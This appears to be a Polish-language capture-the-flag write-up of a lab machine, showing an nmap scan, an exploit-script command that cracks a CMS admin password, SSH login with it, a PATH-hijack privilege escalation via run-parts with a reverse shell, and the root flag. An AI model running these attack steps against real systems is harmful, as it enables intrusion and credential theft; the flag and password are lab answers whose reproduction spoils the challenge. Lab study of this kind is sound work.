Writeup - 24.08.2021


NMap

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 21:25 CEST                                                                                                                                                                            
Nmap scan report for writeup.htb (10.10.10.138)                                                                                                                                                                                             
Host is up (0.089s latency).                                                                                                                                                                                                                
Not shown: 998 filtered ports                                                                                                                                                                                                               
PORT   STATE SERVICE VERSION                                                                                                                                                                                                                
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                                                                                                                                                                          
| ssh-hostkey:                                                                                                                                                                                                                              
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)                                                                                                                                                                              
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)                                                                                                                                                                             
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)                                                                                                                                                                           
80/tcp open  http    Apache httpd 2.4.25 ((Debian))                                                                                                                                                                                         
| http-robots.txt: 1 disallowed entry                                                                                                                                                                                                       
|_/writeup/                                                                                                                                                                                                                                 
|_http-title: Nothing here yet.                                                                                                                                                                                                             
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Strona główna


robots.txt


Searchsploit

python 46635.py -u http://writeup.htb/writeup --crack -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

ssh

ssh jkr@10.10.10.138			raykayjay9

user.txt ``


Privilege Escalation

Podczas logowania przez SSH, używając pspy widzimy taką linię

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

linpeas

Użytkownik należy do grupy staff, która:


Zatem trzeba znaleźć program, który wykonuje się bez ścieżki absolutnej. Czyli dokładnie tak jak run-parts


Zatem ustawiam reverse-shell

I podczas logowania na drugim oknie do SSH otrzymujemy shell roota

root.txt

e132dc8a7ebc8c0a79ed5339b971dddc